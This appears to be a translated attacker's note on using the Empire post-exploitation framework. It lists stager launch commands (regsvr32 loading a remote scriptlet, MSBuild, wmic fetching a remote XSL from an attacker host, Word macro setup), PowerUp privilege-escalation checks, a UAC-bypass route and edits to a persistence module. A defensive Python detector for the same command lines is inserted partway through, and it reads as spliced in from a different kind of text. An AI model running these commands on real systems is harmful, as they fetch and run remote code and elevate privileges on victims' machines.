Empire privilege escalation and persistence

Several ways to use stagers

windows/launcher_sct

regsvr32 /u /s /n /i:http://192.168.1.135/launcher.sct scrobj.dll

scrobj.dll: fixed (always this DLL name)

windows/launcher_vbs

Run: Cscript launcher.vbs

windows/launcher_xml

Run:
cd C:\Windows\Microsoft.NET\Framework\v4.0.30319
.\MSBuild.exe C:\users\一瓢饮\Desktop\la.xml

windows/wmic

wmic invocation: wmic process call create calc -> command

Run: wmic os get /format:"http://192.168.1.135/la.xsl"

windows/macro

1. Word Options --> Trust Center --> Macro Settings --> Enable all macros
2. Developer tab --> Macros --> Create (all active templates and documents) --> TemplateProject --> Microsoft Word Objects --> ThisDocument --> insert the macro code (VBA)
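From the defender's side, the four stager launch lines above (regsvr32 with a remote scriptlet and scrobj.dll, cscript running a .vbs, MSBuild given an .xml project, wmic with a remote /format: URL) are all plain process command lines that process-creation logging records. The Python below is an added example, not part of the original note or of Empire, that flags those patterns in constructed Sysmon-style records; the rule set, the record format and the sample lines are assumptions.

```python
import re

# Detection rules for the stager launch patterns listed above (assumed rule
# set, not from the original note): rule name -> regex over the command line.
RULES = {
    "regsvr32_remote_scriptlet": re.compile(
        r"regsvr32(\.exe)?\b.*\s/i:https?://.*\bscrobj\.dll", re.I),
    "script_host_vbs": re.compile(
        r"\b[cw]script(\.exe)?\b.*\.vbs\b", re.I),
    "msbuild_inline_task": re.compile(
        r"\bmsbuild(\.exe)?\b.*\.(xml|csproj|proj)\b", re.I),
    "wmic_remote_xsl": re.compile(
        r'\bwmic(\.exe)?\b.*\s/format:"?https?://', re.I),
}


def classify(command_line):
    """Return the names of all rules matched by one process command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def scan_log(lines):
    """Parse 'key=value|key=value' records; return (host, user, cmdline, rules) hits."""
    hits = []
    for line in lines:
        fields = dict(kv.split("=", 1) for kv in line.split("|"))
        rules = classify(fields.get("CommandLine", ""))
        if rules:
            hits.append((fields.get("Host"), fields.get("User"),
                         fields["CommandLine"], rules))
    return hits


# Constructed sample records (not from the page); '|' separates fields.
# The last two lines are benign uses of the same binaries and must not fire.
SAMPLE_LOG = [
    'Host=WS01|User=alice|CommandLine=regsvr32 /u /s /n /i:http://192.168.1.135/launcher.sct scrobj.dll',
    'Host=WS01|User=alice|CommandLine=Cscript launcher.vbs',
    'Host=WS02|User=bob|CommandLine=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe C:\\users\\bob\\Desktop\\la.xml',
    'Host=WS02|User=bob|CommandLine=wmic os get /format:"http://192.168.1.135/la.xsl"',
    'Host=WS03|User=svc|CommandLine=regsvr32 /s C:\\Program Files\\Vendor\\plugin.dll',
    'Host=WS03|User=svc|CommandLine=wmic os get caption /format:list',
]

if __name__ == "__main__":
    for host, user, cmd, rules in scan_log(SAMPLE_LOG):
        print(f"{host} {user} {rules}: {cmd}")
```

The regexes key on the remote-URL and scriptlet arguments rather than on the binary name alone, which is what keeps the two benign records from matching.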

Privilege escalation

GitHub | Gitee (码云)

Exploiting UAC

Bypassing UAC

Local privilege escalation: vulnerability lookup -> powershell/privesc/sherlock | windows-exploit-suggester.py

powerup

usemodule privesc/powerup/allchecks    # checks whether any PowerUp-detectable weakness can be exploited

# what is checked
[*] Checking if user is in a local group with administrative privileges...
# result
[+] User is in a local group that grants administrative privileges!
# exploitation method
[+] Run a BypassUAC attack to elevate privileges to admin.

Persistence

debugger module code changes:

Lines 136-139: wrap in ''' ''' to comment them out

Line 180: press Tab once to fix the indentation